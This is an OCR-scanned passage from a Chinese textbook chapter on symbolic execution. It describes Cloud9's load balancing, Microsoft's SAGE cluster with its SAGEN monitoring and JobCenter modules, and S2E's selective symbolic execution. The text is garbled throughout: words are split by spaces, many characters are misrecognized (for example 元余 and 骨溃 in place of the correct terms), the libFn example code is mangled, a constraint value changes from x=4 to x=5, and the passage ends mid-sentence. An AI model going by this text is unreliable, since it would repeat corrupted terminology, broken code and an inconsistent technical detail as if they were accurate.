不 同 于 序列 化 的 符号 执行 过 程 ,只 能 使 用 一 种 策略 对 执行 树 进 行 遍历 ,Cloud9 系统 
可 以 有 多 种 策略 并 存 。 可 以 将 搜索 策略 组 合 类 比 成 证 券 投资 中 的 策略 组 合 : 假设 搜索 策 
略 是 股票 ,工作 节点 (Worker) 是 现金 ,组 合 策略 的 回报 就 是 单位 时 间 内 的 投资 收益 ,现在 
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的 问题 就 可 以 等 价 成 选择 就 最 合适 的 股票 投资 组 合 策略 ,使 得 在 规定 时 间 内 达到 全 系统 
的 收益 最 大 化 。 既 然 将 路 径 搜索 问题 转换 成 了 投资 组 合 策略 收益 最 大 化 问题 ,就 可 以 使 
用 投资 组 合 策略 理论 中 的 现 有 成 果 , 如 多 样 化 策略 及 投机 策略 、 定 量 技术 等 来 提高 回报 
率 ,包括 有 效 边 界 理论 、 回 归 分 析 模 型 等 。 例 如 ,可 以 投机 地 使 用 小 部 分 工作 节点 来 执行 
一 种 策略 对 程序 中 的 某 些 特殊 片段 进行 探索 ,同时 对 全 局 执行 树 使 用 基础 策略 进行 探索 ， 
利用 这 种 组 合 方式 来 提高 全 局 搜索 效率 。 

假设 这 里 的 全 局 策略 以 最 大 代码 覆盖 率 为 导向 。 如 前 面 所 介绍 的 ,在 Cloud9 中 用 0- 
1 位 来 表示 执行 树 的 节点 , 当 Worker 节点 探索 路 径 的 同时 就 会 记录 代码 的 覆盖 情况 ,并 
在 Worker 节点 向 Load balancer 汇报 节点 状态 时 将 代码 覆盖 情况 一 同 发 送 ,这样 Load 
balancer 就 可 以 维护 一 个 全 局 的 代码 覆盖 向 量 , 每 当 接收 到 新 的 状态 信息 就 对 向 量 进行 
更 新 ,并 将 结果 返回 给 Worker 节点 ,无 论 本 地 使 用 何 种 路 径 搜索 策略 ,都 不 会 对 已 经 探 
索 过 的 节点 重复 遍历 ,这 样 就 保证 了 本 地 探索 策略 与 全 局 策略 的 目标 一 致 性 。 

4) 元 余 最 小 化 算法 

要 实现 系统 的 可 扩展 性 ,首先 就 要 解决 元 余 问 题 。 对 于 Cloud9 来 说 ,元 余 问题 的 根 
源 在 于 探索 过 程 中 出 现 的 重复 状态 ,无 论 是 在 同一 节点 上 ,还 是 不 同 节点 间 从 同一 状态 开 
始 探索 的 时 候 , 都 会 造成 大 量 的 完 余 工作 。Cloud9 的 解决 方案 是 ,对 于 不 同 节点 尽 可 能 
保证 划分 的 是 执行 树 没有 交集 的 独立 片段 ,对 于 节点 内 的 完 余 状态 及 时 进行 检查 和 排除 。 

设计 者 发 现 ,在 符号 执行 过 程 中 有 一 半 的 时 间 花 费 在 约束 求解 上 ,而 约束 求解 中 又 有 
大 量 的 重复 工作 ,实验 数据 表明 大 量 的 条 件 约束 求解 结果 可 以 重复 使 用 ,所 以 Cloud9 为 
已 经 求解 过 的 约束 表达 式 建立 分 布 式 存储 结构 ,帮助 所 有 工作 节点 重用 约束 求解 数据 。 

男 外 一 个 造成 元 余 问 题 的 根源 就 是 节点 异常 退出 任务 ,其 他 节点 不 得 不 重复 执行 其 
已 经 探索 过 的 路 径 。 为 了 解决 该 问题 ,Cloud9 为 每 个 节点 在 不 同 执行 阶段 建立 恢复 点 ， 
在 节点 出 现 问 题 后 能 够 快速 在 本 地 或 者 是 同 级 节点 上 进行 恢复 ,防止 任务 的 重复 执行 。 

上 面 介绍 了 解决 该 问题 的 基本 思路 ,下 面 对 其 实现 方法 进行 说 明 。 对 于 Cloud9 中 的 
Worker 节点 簇 来 说 ,每 个 节点 只 对 自己 已 经 探索 过 的 执行 树 子 树 是 可 见 的 , 换 句 换 说 ， 
Wi 节点 探索 过 的 子 树 对 于 Wi 节点 来 说 是 完全 未 知 的 。 对 于 系统 来 讲 , 没 有 一 个 节点 维 
护 了 全 局 的 程序 执行 树 ,包括 Load balancer。 各 节点 间 探 索 路 径 的 不 相交 性 及 全 局 探索 
的 完整 性 只 能 通过 负载 均衡 算法 来 保证 。 

在 介绍 算法 之 前 ,首先 解释 Worker 探索 执行 树 过 程 中 包含 的 3 类 节点 ,如 图 5-32 
所 示 。 

* 终止 节点 (dead node) : 该 部 分 节点 在 之 前 的 探索 中 已 经 被 遍历 ,之 后 的 探索 需要 
栅栏 节点 (fence node): 该 部 分 节点 标定 了 不 同 Worker 节点 探索 的 执行 子 树 的 
边界 。 

待 测试 节点 (candidate node): 该 部 分 节点 表示 需要 被 继续 探索 的 节点 。 每 个 
Worker 节点 只 对 待 测试 节点 进行 探索 。 

为 了 减少 系统 元 余 , 同 时 增强 探索 的 完整 性 ,就 需要 保证 不 同 节点 的 待 测试 节点 集合 

没有 交集 ,同时 所 有 节点 的 待 测试 节点 集合 的 并 集 组 成 完整 的 执行 树 , 如 图 5-32 所 示 。 
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Bi 5-32 Cloud9 的 Worker 节点 示意 


栅栏 节点 
终止 节点 
待 测试 节点 


Worker 节点 Wi 在 每 个 阶段 的 任务 都 是 从 工作 队列 中 取出 待 测试 节点 并 进行 路 径 探索 ， 
Worker 节点 间 的 任务 主要 就 是 任务 转送 。 

当 各 Worker 节点 出 现 负载 不 均衡 的 情况 时 ,Load balancer 就 会 选择 一 个 负载 较 重 
的 节点 W、 和 一 个 负载 较 轻 的 节点 Wi, 并 控制 两 个 节点 进行 任务 传递 ,即将 W, 的 部 分 
任务 发 送 到 W 节点 上 。 通 常情 况 下 , Wa 可 能 是 新 加 入 系统 的 节点 ,或 者 是 已 经 完成 其 
自身 任务 的 节点 。 节 点 间 的 任务 传递 开始 后 ,W, 从 工作 队列 中 选择 个 待 测试 节点 ,将 
它们 打包 并 编码 发 送 至 Wa 节点 ,这 些 待 测试 节点 就 成 为 了 W 节点 的 栅栏 节点 , W, 不 
会 再 对 这 些 节点 任务 进行 探索 ,这 样 的 设计 可 以 避免 系统 中 不 同 工 作 节 点 对 相同 的 任务 
进行 探索 。 

当 任务 传递 到 Wa 节点 的 工作 队列 后 , Wa 首先 将 这 些 待 测试 节点 标记 为 虚拟 节点 
(virtual node) ,因为 当前 这 些 节点 都 由 路 径 编码 表示 ,如 果 要 对 其 进行 探索 首先 需要 对 
路 径 进行 重 放 ,与 虚拟 节点 相对 应 的 是 实 节 点 (materialized node) ,其 表示 的 是 Wu 节点 
工作 队列 中 原 有 的 待 测试 节点 ,因为 这 些 节 点 对 应 的 程序 状态 都 保留 在 节点 中 ,所 以 无 须 
重 放 操作 即 可 直接 进行 探索 。 

图 5-33 是 Wu 节点 的 执行 子 树 状态 ,其 中 包含 了 虚拟 节点 和 实 节点 两 种 待 测试 节 
点 ,Worker 节点 的 任务 就 是 从 工作 队列 中 选择 待 测试 节点 进行 探索 ,选择 待 测试 节点 的 
过 程 会 按照 一 定 的 策略 进行 。 首 先 选择 队列 中 的 实 节 点 进行 探索 ,而 后 对 虚拟 节点 进行 
探索 。 对 虚拟 节点 进行 探索 时 ,首先 需要 对 触发 该 节点 的 执行 路 径 进行 重 放 ,对 于 路 径 覆 
盖 到 的 节点 都 标记 为 终止 节点 ,最 后 将 待 测试 节点 从 虚拟 节点 转换 成 实 节 点 。 各 节点 类 
型 间 的 详细 状态 转换 过 程 如 图 5-34 所 示 , 当 完 整地 执行 一 条 运行 路 径 时 ,除去 终止 节点 
外 的 节点 都 是 该 Worker 节点 的 实 待 测试 节点 。 
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以 上 的 并 行 方案 真 的 有 效 吗 ? 微软 公司 的 研究 人 员 虽 然 提出 了 分 代 搜 索 算法 ,但 并 
没有 实现 类 似 SCORE 的 并 行 系统 方案 ,而 是 进行 了 更 加 简单 而 实用 的 设计 。Patrice 
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图 5-34 ”执行 树 状 态 转换 


Godefroid 等 人 提出 直接 使 用 大 规模 计算 集群 进行 多 任务 的 同步 执行 来 提升 系统 效率 ,并 
基于 SAGE 系统 实现 了 对 应 的 实用 化 工具 。 该 系统 具体 的 设计 思路 非常 接近 实用 ,其 也 
是 目前 已 知 的 唯一 在 实际 生产 的 测试 环节 发 挥 重要 作用 的 工具 。 下 面 对 其 核心 框架 和 关 
键 技术 细节 进行 介绍 。 

1. 系统 结构 

通过 图 5-35 所 示 的 系统 结构 可 以 看 到 ,整个 系统 包含 3 个 主要 部 分 : SAGECloud 
(SAGE 节点 集群 ) .SAGE JobCenter( 任 务 中 心 模块 )\SAGEN( 系 统 监 控 模块 ) 。 

1) SAGECloud( SAGE 节点 集群 ) 

SAGE 系统 的 工作 原理 已 经 在 之 前 的 章节 做 了 介绍 ,包括 其 内 部 架构 及 具体 技术 细 
节 ,SAGECloud 就 是 部 署 在 计算 集群 上 的 SAGE 工作 集群 ,计算 集群 中 的 每 个 虚拟 机 
(VMD) 中 可 以 部 署 一 个 SAGE 系统 。 

2) SAGEN( 系 统 监 控 模块 

SAGE 对 大 型 程序 进行 测试 时 ,在 单一 节点 上 序列 化 地 执行 多 个 测试 任务 , 极 大 的 时 
间 消 耗 使 其 无 法 满足 测试 需求 。 另 外 ,长 时 间 测 试 的 过 程 中 可 能 产生 大 量 的 导致 程序 崩 
溃 的 测试 用 例 及 相应 的 检测 报告 ,单一 节点 GB 级 或 者 TB 级 的 硬盘 空间 根本 无 法 满足 
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图 5-35 SAGEN 系统 结构 














这 样 的 存储 要 求 。 为 了 提升 系统 的 计算 和 存储 性 能 ,研究 人 员 尝 试 在 计算 集群 上 部 署 系 
统 ,部 署 思路 十 分 简单 ,为 各 节点 (VM) 分 配 不 同 的 测试 任务 ,但 这 样 的 设计 显然 仍 不 能 
满足 需求 。 如 果 为 各 节点 配置 大 容量 的 存储 设备 则 成 本 会 过 高 ,车 配置 的 存储 空间 较 小 
则 仍然 无 法 完整 保存 生成 的 测试 用 例 , 还 是 会 大 大 影响 节点 对 用 例 的 检测 及 分 析 性 能 。 
另外 ,多 节点 并 行 与 单 节点 独立 执行 任务 不 同 ,如 果 不 对 各 节点 的 系统 状态 进行 监控 , 则 
很 难 对 计算 集群 进行 系统 的 管理 。 基 于 以 上 问题 ,设计 者 对 并 行 系统 的 监控 模块 提出 了 
如 下 设计 原则 。 

。 需要 为 各 节点 上 SAGE 系统 的 每 一 轮 运行 生成 唯一 的 日 志 记 录 , 即 使 一 轮 运行 未 
正确 地 启动 ,也 为 其 生成 一 个 全 局 唯一 的 标识 符 。 这 样 的 设计 策略 方便 分 析 人 员 
对 系统 中 的 各 轮 运 行进 行 无 歧义 的 识别 和 跟踪 ,方便 后 期 有 针对 性 地 动态 调试 和 
静态 分 析 。 

每 条 日 志 记 录 中 都 包含 足够 的 信息 以 帮助 分 析 人 员 重 现 这 一 轮 的 运行 ,包括 所 有 
的 配置 文件 、 命 令 行 参数 等 内 容 。 这 个 设计 原则 是 为 了 帮助 测试 人 员 重 现 一 次 失 
败 的 运行 ,查找 运行 失败 的 根本 原因 ,对 于 失败 的 任务 系统 还 会 记录 执行 过 程 中 
的 标准 输入 、 输 出 流 帮 助 查找 隐 性 错误 原因 。 

每 个 日 志 有 唯一 的 URL, 以 便 在 浏览 器 中 查阅 。 在 实际 应 用 中 这 个 设计 原则 是 
非常 实用 的 ,运行 时 随时 将 异常 文件 和 运行 日 志 的 链接 通过 邮件 反馈 给 设计 人 
员 , 可 以 方便 设计 人 员 及 时 分 析 和 应 对 。 为 了 实时 展现 系统 运行 状态 ,还 设计 了 
Web 前 端 对 各 节点 当前 一 轮 的 运行 状态 及 系统 数据 统计 进行 展示 ,例如 引起 程 
序 崩 溃 的 测试 用 例 总 数 ,运行 失败 的 任务 占 总 任务 的 比例 。 使 用 这 个 Web 前 端 
可 以 快速 地 识别 产生 大 量 崩 溃 的 节点 ,造成 大 量 节点 执行 崩溃 的 任务 特征 。 通 过 
将 这 些 数 据 和 链接 反馈 给 用 户 , 可 以 辅助 其 修改 测试 时 的 配置 参数 等 内 容 , 对 测 
pa 

志 服 务 系统 对 各 节点 的 影响 应 该 尽 可 能 小 。 这 里 所 说 的 影响 小 不 仅 包括 对 节 
: CPU 负载 等 硬件 性 能 的 影响 ,还 包括 对 容错 性 的 考虑 , 即 当日 志 服务 系统 异常 
终止 时 ,不 会 影响 节点 上 SAGE 系统 的 正常 运行 。 
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。 中 央 日 志文 件 需要 包含 服务 充足 的 信息 以 方便 后 面 的 数据 统计 和 分 析 。 为 了 方 
便 使 用 脚本 进行 系统 化 分 析 ,其 中 的 数据 格式 应 该 尽 可 能 统一 。 

(1) 日 志 服务 。 

日 志 服 务 系 统 的 中 心 控 制 节 点 使 用 Windows Server 2008 系统 ,并 部 署 Microsoft 
SQL Server 数据 库 。 每 个 子 节点 (客户 机 ) SQL Server 直接 连接 以 进行 记录 的 插入 和 
更 新 。 更 新 操作 发 生 在 各 节点 每 一 轮 SAGE 运行 的 开始 阶段 ,新 的 (测试 用 例 导致 的 ) 异 
常 崩 溃 发 生 之 后 ,任务 失败 发 生 后 ,以 及 当 一 轮 SAGE 运行 至 30 一 45min 后 。 系 统 尽 量 
保证 各 子 节点 的 插入 操作 随机 分 布 在 某 一 个 时 间 段 ,而 不 是 同时 对 数据 库 进行 操作 ,以 避 
免 发 生 访问 异常 。 

各 SAGE 系统 每 一 轮 运行 可 能 产生 数 百 GB 的 数据 ,SAGEN 的 设计 原则 是 尽 可 能 
减少 子 节点 需要 传递 到 中 控 节 点 的 消息 ,否则 会 占据 极 大 的 网 络 带宽 ,并 对 中 控 节点 的 存 
储 造成 极 大 的 负担 。 设 计 者 对 初始 配置 信息 进行 优化 ,使 其 只 包含 初始 配置 和 命令 行 信 
息 ,缩小 到 KB 级别。 子 节点 (VM) 与 中 控 节 点 的 心跳 包 中 包含 节点 生成 的 测试 用 例 总 
28 测试 产生 的 骨 溃 总 数 、 代 码 覆 盖 率 以 及 系统 日 志文 件 ,这 些 信息 通常 只 需要 数 百 KB 
就 可 以 完整 描述 ;而 对 于 一 个 没有 出 现任 务 异 常 、 约 束 求解 超时 、 测 试 软 件 骨 省 的 SAGE 
节点 ,描述 其 状态 的 心跳 包 会 更 小 ,对 于 存在 约束 求解 超时 间 题 的 节点 ,需要 将 导致 超时 
的 完整 约束 信息 传递 到 SAGEN 日 志 服务 系统 中 ,以 便 进行 后 续 分 析 。 系 统 会 限制 每 一 
轮 传递 的 约束 数量 , 当 数 量 超过 阔 值 时 , 则 只 传递 部 分 路 径 约束 ( 这 里 假设 在 一 轮 运行 中 
导致 约束 求解 问题 的 原因 很 可 能 出 自 同一 个 约束 条 件 )。 对 于 导致 符号 执行 失败 的 测试 
用 例 , 系 统 会 选择 将 其 执行 路 径 记录 传递 到 中 控 服务 器 中 ,这 同样 需要 限定 每 一 轮 中 传递 
的 上 限 。 

(2) 数据 展示 。 

本 系统 设计 了 Web 前 端 用 以 展示 对 日 志 服务 系统 中 控 服 务 器 中 数据 的 分 析 统 计 结 
果 , 对 于 各 子 节点 的 每 一 轮 SAGE 运行 过 程 也 有 对 应 的 展示 信息 ,主要 包括 运行 过 程 的 
配置 信息 ,节点 的 “健康 ”状态 ,测试 软件 出 现 崩 溃 的 总 次 数 ,以 及 各 节点 对 应 的 URL 
(Uniform/Universal Resource Locator, 统 一 资源 定位 符 ) , 单 击 该 URL 就 可 以 从 服务 器 
下 载 更 加 详细 的 内 容 , 包 括 符号 执行 任务 的 完成 状况 .约束 表达 式 生成 数量 等 。 

要 获得 更 加 详细 的 数据 统计 ,可 以 直接 对 数据 库 进 行 操作 。 例 如 ,如 果 使 用 者 想 了 解 
所 有 SAGE 运行 过 程 中 有 哪些 至 少 完 成 了 一 次 符号 执行 任务 , 则 使 用 相应 的 数据 字段 编 
写 SQL 请 求 即 可 以 得 到 详细 的 结果 。 

3) JobCenter( 任 务 中 心 模块 ) 

日 志 服 务 系统 让 测试 人 员 对 系统 的 运行 状态 有 了 实时 的 把 控 , 但 这 只 是 该 并 行 系统 
的 一 小 部 分 ,最 重要 的 是 如 何 控 制 系统 中 大 量 的 子 节点 高 效 地 运行 SAGE 系统 执行 测试 
任务 。 另 外 ,系统 对 程序 的 测试 不 可 能 是 一 成 不 变 的 ,因为 当 SAGE 测试 一 个 程序 的 时 
候 , 开 发 者 会 持续 地 对 程序 代码 进行 更 新 ,修补 漏洞 并 给 软件 添加 新 的 特征 ,所 以 需要 随 
时 修改 SAGE 任务 ,使 其 时 刻 对 最 新 的 软件 版 本 进行 测试 ,避免 查找 已 经 被 修复 的 漏洞 。 

(1) 配置 信息 管理 。 

配置 信息 中 包括 一 系列 的 初始 测试 用 例 (也 称 为 种 子 文件 )、 目 标 测试 程序 的 可 执行 
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代码 及 其 启动 命令 ,以 及 一 系列 的 参数 ,例如 SAGE 任务 的 超时 韶 值 。 针 对 一 个 测试 程 
序 可 能 需要 多 组 配置 信息 ,例如 大 型 的 文件 解析 软件 本 身 可 以 解析 多 种 文件 格式 。 通 常 
每 天 需要 定义 数 百 组 配置 信息 以 保证 系统 不 会 处 于 空闲 状态 。 人 工地 为 上 百 台 计算 机 中 
的 SAGE 配置 启动 信息 会 是 一 个 囊 梦 ,因此 系统 使 用 一 个 任务 管理 系统 JobCenter 自动 
完成 这 个 任务 。 假 设 软件 测试 的 合作 方 会 对 子 节点 上 的 待 测试 软件 进行 自动 更 新 , 重 置 
测试 节点 的 测试 状态 并 清空 磁盘 ,JobCenter 会 对 子 节点 中 的 SAGE 系统 进行 自动 更 新 ， 
提供 运行 配置 信息 并 开启 测试 任务 。 但 每 次 任务 开始 前 ,首先 需要 人 工 对 配置 信息 中 的 
参数 等 进行 确认 (例如 启动 参数 等 ) ,JobCenter 允许 在 单个 节点 上 进行 尝试 运行 ,如 果 测 
试 节点 能 够 正确 运行 ,再 将 任务 进行 分 发 。 

(2) 控制 及 恢复 。 

JobCenter 能 够 检测 到 一 个 SAGE 任务 是 否 已 经 终止 ,并 提供 新 的 配置 信息 使 其 重 
新 运行 。 这 意味 着 ,即使 一 个 配置 信息 可 能 是 错误 的 ,并 导致 SAGE 系统 异常 终止 ,也 不 
会 产生 任何 影响 ,通过 JobCenter 的 实时 检测 和 报告 可 以 快速 地 恢复 子 节点 到 正常 状态 。 
JobCenter 这 样 的 设计 并 不 是 设计 者 随意 决定 的 ,而 是 在 实际 观察 测试 数据 后 提出 的 

除了 实时 更 新 测试 软件 和 SAGE 系统 ,还 需要 实时 对 Windows 系统 、 各 种 网 络 服务 
等 进行 补丁 更 新 ,这 才能 保证 崩溃 在 真实 环境 下 是 有 效 的 。 但 是 系统 或 者 服务 打 完 补丁 
后 通常 需要 对 系统 进行 重启 ,有 的 错误 更 新 可 能 导致 系统 无 法 正常 启动 ,SAGE 每 隔 一 段 
时 间 会 对 系统 建立 快照 ,保证 各 节点 都 能 从 异常 状态 中 恢复 过 来 。 为 了 避免 多 节点 重复 
执行 一 个 配置 信息 ,JobCenter 会 记录 每 个 配置 信息 与 节点 编号 之 间 的 映射 关系 ,在 系统 
完成 更 新 后 重新 将 配置 信息 发 送 到 节点 继续 执行 。 

2. 任务 划分 方法 

通过 上 一 节 的 介绍 可 以 知道 ,SAGE 整个 系统 有 相对 独立 的 4 个 阶段 ,理论 上 来 说 ， 
这 4 个 阶段 可 以 在 不 同 节点 上 完成 。 例 如 ,测试 者 可 以 在 一 台 计 算 机 上 对 程序 执行 过 程 
进行 记录 ,然后 将 获取 的 执行 路 径 记 录 发 送 到 第 二 个 节点 上 进行 符号 执行 分 析 , 再 将 提取 
的 约束 表达 式 发 送 到 另 一 个 节点 上 进行 分 代 搜索 和 约束 求解 ,最 后 在 新 的 节点 上 对 新 生 
成 的 用 例 进 行 测试 。 

实际 实现 时 通常 并 不 会 这 样 做 ,而 是 将 所 有 阶段 放 在 一 个 节点 上 完成 ,这 样 做 有 两 个 





原因 : 

。 第 一 阶段 记录 的 执行 trace 通常 都 有 数 百 MB 大 小 ,在 节点 之 间 进 行 传输 会 造成 
很 大 的 网 络 负载 ,还 会 使 任务 执行 有 很 大 的 延迟 。 

。 通过 实际 测试 可 以 看 到 ,大 部 分 约束 表达 式 的 求解 时 间 在 数 十 秒 内 ,直接 求解 也 
比 对 其 进行 传输 花费 的 代价 要 小 。 

3. 技术 细节 介绍 

1) 系统 错误 修复 

通过 监控 数据 ,心跳 包 可 以 实时 监控 各 节点 的 运行 状态 ,知道 哪些 节点 出 现 了 问题 。 

在 SAGEN 提出 前 ,通常 测试 人 员 是 没有 办 法 监控 节点 的 状态 的 ,节点 可 能 已 经 异常 宕 

机 ,或 者 因为 错误 的 测试 用 例 或 启动 参数 导致 任务 未 正常 启动 ,又 或 是 因为 存储 空间 不 够 
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导致 任务 失败 ,在 整个 任务 结束 后 ,测试 人 员 可 能 才 会 察觉 到 节点 上 的 异常 。 或 许 读者 认 
为 节点 出 现 问题 的 几率 很 低 , 但 SAGEN 获取 的 数据 显示 , 近 300 个 VM 节点 同时 运行 
SAGE 任务 ,只 有 在 最 开始 的 一 段 时 间 内 有 大 量 节 点 在 线 , 仅 仅 几 个 小 时 内 就 有 很 大 一 部 
分 节点 因为 任务 失败 、 系 统 异常 .网 络 异常 等 原因 而 被 认为 已 经 宕 机 , 数 天 后 可 以 看 到 大 
部 分 节点 已 经 处 于 异常 状态 ,整个 系统 几乎 处 于 瘫痪 状态 。 

通过 对 失败 节点 的 配置 信息 和 日 志 信 息 进 行 分 析 , 设 计 者 发 现 大 量 的 任务 失败 是 因 
为 在 符号 执行 的 初始 阶段 出 现 了 网 络 异 常 ,相应 地 ,设计 者 在 SAGEN 中 增加 了 重启 
session, 使 得 短暂 的 网 络 异 常 不 会 对 后 面 的 运行 产生 太 大 的 影响 。 统 计 结 果 显 示 , 这 个 
简单 的 修补 就 可 以 保证 大 部 分 节点 在 相对 稳定 的 状态 下 运行 。 

虽然 已 经 有 了 很 大 改进 ,但 毕 竞 还 有 近 一 半 的 节点 在 大 部 分 的 时 间 内 没有 办 法 稳定 
运行 。 通 过 对 SAGE 运行 失败 时 的 测试 用 例 、 约 束 表达 式 等 配置 信息 进行 分 析 , 统 计 每 
个 导致 运行 失败 的 问题 所 占 的 比例 ,对 系统 进行 有 针对 性 的 修改 ,或 对 配置 信息 进行 重新 
定义 。 例 如 ,大 部 分 节点 的 任务 失败 原因 是 因为 存储 空间 不 足 , 则 只 需要 对 系统 进行 存储 
阅 值 重新 设 定 , 当 存储 空间 降低 到 某 一 数值 时 ,就 对 系统 中 未 造成 异常 的 测试 用 例 进 行 删 
除 。 使 用 该 策略 后 ,系统 的 稳定 性 进一步 得 到 提升 。 

2) 漏洞 唯一 性 问题 

实际 测试 中 ,大 量 的 测试 用 例 可 能 导致 一 个 相同 的 异常 ,为 了 解决 这 个 问题 ,设计 者 
为 每 个 已 经 发 现 的 程序 崩溃 都 建立 崩溃 发 生 时 的 堆栈 哈 希 及 时 间 戳 ,这 样 通过 对 比 哈 希 
值 就 可 以 排除 大 量 宛 余 的 用 例 ,节省 存储 空间 。 


5.4 选择 符号 执行 技术 
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在 本 节 之 前 介绍 的 各 项 符号 执行 技术 都 需要 对 测试 程序 的 所 有 执行 路 径 进行 遍历 ， 
即 探索 执行 树 中 的 所 有 分 支 节点 和 叶子 节点 ,这 样 才能 保证 测试 结果 的 完整 性 。 但 对 于 
规模 庞大 的 测试 程序 ,完全 遍历 其 执行 树 的 时 间 代 价 极 高 ,研究 人 员 和 希望 通过 改进 路 径 搜 
索 算 法 和 使 用 并 行 技术 来 加 快 对 执行 树 的 遍历 速度 ,但 就 目前 的 实验 结果 来 说 ,这 些 方案 
的 效果 都 不 理想 。 

瑞士 洛桑 理工 大 学 的 Vitaly Chipounov 等 人 在 尝试 解决 该 问题 时 另辟蹊径 ,研究 人 
员 发 现 ,在 一 个 程序 的 执行 树 中 ,通常 并 不 是 所 有 路 径 对 测试 人 员 都 有 分 析 价 值 ,可 能 只 
有 部 分 子 树 或 子路 径 与 测试 目标 相 一 致 。 但 大 部 分 符号 执行 工具 在 分 析 目 标 程 序 时 ,会 
对 程序 内 部 代码 及 外 部 调用 函数 集合 生成 的 执行 树 进行 完整 遍历 ,因此 有 大 量 的 分 析 时 
间 浪 费 在 测试 人 员 并 不 感 兴趣 的 数据 上 。Vitaly Chipounov 等 人 基于 此 发 现 提出 了 选择 
符号 执行 技术 ,其 基本 思想 是 : 当 测 试 程序 执行 到 测试 人 员 感 兴趣 的 程序 段 时 ,对 代码 进 
行 符号 执行 分 析 , 即 对 遇 到 的 所 有 路 径 分 支 进行 分 析 ( 如 KLEE) , 当 程序 执行 到 不 感 兴趣 
的 外 部 调用 函数 段 时 ,对 代码 进行 单 路 径 具 体 执行 ,研究 人 员 基 于 此 思想 实现 了 工 
具 S2EU9, 


第 5 章 符号 执行 


从 程序 执行 树 的 角度 看 , 当 对 目标 程序 的 代码 段 进行 多 路 径 模 式 ( 符 号 执行 模式 ) 分 
析 时 ,执行 树 的 宽度 和 深度 都 在 增长 ; 当 对 外 部 调用 函数 代码 段 进 行 探索 时 ,S2E 切换 到 
单 路 径 具 体 模 式 ,此 时 只 有 执行 树 的 深度 在 扩展 。 选 择 符号 执行 技术 对 程序 执行 树 的 探 
索 是 弹性 的 ,其 不 以 全 路 径 遍 历 为 目的 ,而 是 以 测试 人 员 感 兴趣 的 路 径 片 段 为 目标 ,将 需 
要 分 析 的 执行 树 规模 缩减 到 最 小 ,该 方法 在 某 种 程度 上 巧妙 地 缓解 了 路 径 爆 炸 问 题 。 
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下 面 以 图 5-36 为 例 说 明 S2E 的 分 析 过 程 。 对 程序 app 的 分 析 由 单 路 径 具 体 执行 模 
式 (concrete) 开 始 自 上 而 下 执行 。 当 进入 目标 测试 代码 lib 库 函 数 时 ,S2E 使 测试 进入 多 
路 径 执行 模式 (symbolic) ; 当 程 序 运行 离开 lib 库 函 数 代 码 段 进入 内 核 KERNEL 代码 段 
时 ,S2E 再 次 使 测试 切换 到 单 路 径 模式 。 如 此 反复 ,其 工作 核心 只 有 一 个 , 即 对 目标 代码 
段 \ 函 数 或 程序 片段 使 用 符号 化 执行 进行 分 析 , 对 目标 以 外 的 代码 段 进行 具体 执行 。 
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测试 过 程 中 的 模式 转换 分 为 以 下 两 种 类 型 。 

1. 具体 执行 至 符号 执行 的 转换 

当 appFn 调用 libFn 时 需要 进行 具体 执行 到 符号 执行 的 模式 切换 ,将 libFn 函数 的 
输入 参数 从 具体 值 转换 成 符号 值 (libFn(10) 转 换 成 libFn(a)) ,转换 时 可 对 符号 变量 加 约 
东 条 件 , 在 5. 4. 3 节 进 行 详细 说 明 。 当 转换 发 生 以 后 ,S2E 对 libFn 函数 同时 进行 符号 执 
行 和 具体 执行 (ibFn(10)), 当 符号 执行 完成 对 libFn 函数 所 有 路 径 的 遍历 后 ,S2E 使 用 具 
体 执行 libFn 函数 得 到 的 具体 值 作为 函数 返回 值 跳 转 回 appFn 函数 ,这 样 在 完成 对 libFn 
函数 路 径 遍历 的 同时 并 没有 影响 到 程序 原本 的 执行 状态 。 
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2. 符号 执行 到 具体 执行 的 转换 

从 libFn 到 sysFn 的 过 程 需要 进行 符号 执行 到 具体 执行 的 转换 ,该 过 程 相 对 复杂 。 
假设 libFn 函数 的 代码 如 图 5-37 所 示 ,并且 libFn 的 输入 参数 x 在 函数 入 口 处 没有 任何 
约束 条 件 (xE (一 c2 ,十 cc))。 当 程序 执行 到 第 一 个 计 条 件 分 支 对 应 的 指令 时 ,符号 执行 
引擎 从 当前 搜索 状态 分 裂 成 两 个 状态 ,分 别 表示 对 庄 语 句 两 个 分 支 的 探索 ,其 中 一 个 状 
态 内 为 输入 参数 a 添加 约束 条 件 xE C799 ,5) , 另 一 个 添加 约束 条 件 xE [5, 十 cc)。 符 
号 执行 引擎 继续 探索 libFn 函数 的 执行 路 径 , 进 入 计 语 句 的 then 分 支 后 ,会 调用 sysFn GO PR 
数 ,sysFn 为 非 目标 代码 段 , 这 里 S2E 需要 对 x 变量 进行 实例 化 ,并 将 测试 模式 从 符号 执 
行 切 换 到 具体 执行 。S2E 选择 一 个 具体 值 ,例如 ,x=4( 根 据 x 的 约束 条 件 xE (一 2 ,5) 
求解 得 到 ) ,并 执行 sysFn(4) ,同时 为 ff 分支 添加 新 的 约束 条 件 x 一 4。 





void libFn(int x) { 路 径 约束 条 件 xE (-co, +00) 
if(x <5) { uum 
buf-sysFn(x); x ~~ A 
if (x«0) X 7 
» \ 
} xE (=, 5) xE [5, +2) 
} 











图 5-37 符号 执行 实例 化 示例 


S2E 的 作者 将 上 面 的 符号 变量 实例 化 过 程 称 为 惰性 实例 化 : S2E 按照 需求 对 符号 变 
量 进行 实例 化 ,只 有 在 具体 执行 片段 需要 访问 变量 x 的 值 时 才 进 行 实例 化 操作 ,这 对 实时 
符号 执行 也 是 一 种 优化 ,通过 作者 实验 分 析 , 在 模式 转换 时 堆栈 中 的 很 多 符号 变量 并 不 会 
被 读 取 ,也 就 不 需要 全 部 进行 实例 化 。 

上 面 的 实例 化 操作 为 符号 执行 过 程 引入 了 新 的 问题 ,因为 添加 了 x=4 的 约束 条 件 ， 
所 以 下 面 的 f(x 二 0) 分 支 内 的 代码 不 会 被 执行 , 换 句 话说 ,上 面 的 实例 化 过 程 缩减 了 符号 
执行 的 路 径 探索 范围 ,可 以 称 之 为 “过 约束 "问题 : 路 径 中 生成 约束 条 件 的 过 程 并 不 是 由 
libFn 中 的 代码 决定 ,而 是 由 于 变量 实例 化 而 引入 。 这 里 将 实例 化 过 程 引 入 的 约束 条 件 
称 为 软 性 约束 ,而 将 libFn 中 代码 引入 的 约束 称 为 硬性 约束 。 当 libFn 中 的 分 支 因为 某 个 
软 性 约束 而 不 可 达 时 ,需要 回 退 到 该 软 性 约束 条 件 生成 的 指令 断 点 处 重新 分 析 。 本 例 中 ， 
致使 if(x 二 0) 分 支 不 可 达 的 软 性 约束 为 x=5, 生 成 该 约束 的 代码 是 buf=sysFn(x) ,符号 
